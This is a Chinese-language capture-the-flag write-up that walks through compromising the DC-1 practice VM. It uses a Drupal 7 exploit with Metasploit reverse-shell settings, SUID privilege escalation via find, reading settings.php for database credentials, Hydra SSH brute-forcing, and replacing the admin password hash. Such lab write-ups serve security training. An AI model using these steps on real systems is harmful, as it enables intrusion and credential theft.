DC-1靶站GET点
直接网上下载DC1-9系列的靶站,今天要渗透的是DC-1
老样子:
vm靶机挂着,没有账号密码,也不能登录进去看看,但是一开机,环境已经启动了
不知道开启了什么服务,常规扫描走一波
直接上个全扫描
第一波建议上大规模扫描,记住,一定要大规模!靓仔,我在监狱等你哟
从nmap详细扫描信息中发现主机开发了22端口和80服务
22端口可以用来爆破
80服务用的drupalcms 版本为7
去web站点看看
这里又扫了一下目录,各种敏感目录看了一下,没有getshell的点
这里分析一下Drupal cms ,这个是国外三大主要的cms之一
有能直接getshell的漏洞,且无需登录。
如果遇到用cms的网站,都建议把exp打一遍,没准有惊喜
选择2018年的这个。
填上靶机ip:set RHOSTS 192.168.206.138
设置攻击载荷,这里因为靶站是php,就用个php reverse_tcp隧道
设置攻击机的ip地址
set LHOST 192.168.206.128
然后就run
成功拿到shell,进入交互式模式
这里看到是网站权限所有我们得提权
提权辅助脚本走一波,没有get点
然后就试试了uid提权:
uid提权介绍
然后搜索一波存在哪些有root权利的可执行文件
然后发现了find这个命令,可以进行内核提权
这里直接提升权限为管理员!然后直接用此权限反弹shell或者正向shell,这里提供了两种方法:
正向shell:
靶机
攻击机
反向shell:
查看了一下开发的端口情况,发现3306端口,我的nmap咋没扫到嘞,奇怪
然后本地连接一下,去找找网站的管理员账号密码
必须拿到数据库的账号密码,然后我们之间去看网站的配置文件,一般有数据库链接的账号密码
查看flag1
也是提醒去找配置文件
百度了一下这个cms网站配置目录是
/var/www/sites/default/settings.php
成功拿到数据库账号和密码
本地登录:
在这种shell环境下无法连接数据库,必须ssh到他本地去
然后前面看到开放了22端口,直接九头蛇爆破,但是得先找个能爆破的账号:
直接爆破flag4这个用户,当然你可以直接爆破root这个用户,但要看本地是否允许root用户ssh,我可以去改,但是麻烦了,反正可以提权
九头蛇直接拿到flag4的密码。orange
直接ssh去连
然后连接本地数据库
然后一波常规操作
找到users这个表:
admin这个账号uid为1,password经过加密,这里都拿到数据库,懒得解密了,直接替换一波密码。利用本地加密
切记一定要去/var/www这个目录下,不然提示没有bash
然后web登录
找到了flag3
通过flag3的提示,成功提权找到flag4,然后通过提权在root用户的家目录
拿到最后一个flag
见证菜鸡的信息之旅!